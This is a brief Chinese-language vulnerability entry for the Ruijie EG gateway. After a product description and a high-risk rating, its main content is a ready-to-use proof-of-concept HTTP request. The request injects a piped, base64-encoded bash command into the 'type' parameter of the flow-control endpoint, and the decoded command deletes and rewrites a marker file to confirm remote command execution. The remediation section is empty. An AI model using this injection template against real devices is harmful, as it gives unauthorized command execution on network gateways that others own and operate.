暂无
高危
锐捷EG易网关是一款综合网关产品,集成了先进的软硬件体系构架,并配备了DPI深入分析引擎、行为分析/管理引擎。这款产品能在保证网络出口高效转发的基础上,提供专业的流控功能、出色的URL过滤以及本地化的日志存储/审计服务。
锐捷EG易网关
0x05 POC
POST /flow_control_pi/flwo.control.php?a=flowOpen HTTP/1.1Host: {{Hostname}}User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0Content-Length: 11Accept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Content-Type: application/x-www-form-urlencoded; charset=UTF-8Cookie: {{cookie}}Origin: {{BaseURL}}Referer: {{BaseURL}}/rac_pi/surfilter_selservice.htmSec-Ch-Ua: " Not;A Brand";v="99", "Google Chrome";v="91", "Chromium";v="91"Sec-Ch-Ua-Mobile: ?0Sec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originX-Forwarded-For: xX-Requested-With: XMLHttpRequestAccept-Encoding: gziptype=%7Cbash+-c+%27echo+cm0gLXJmIC4uLzEyMzMyMXF3ZS50eHQgJiYgZWNobyBGMDhiYmZiMkJDOGNlZUQ2ID4gLi4vMTIzMzIxcXdlLnR4dCAyPiYx+%7C+base64+-d+%7C+bash+%26%26+exit+0%27
0x06 修复建议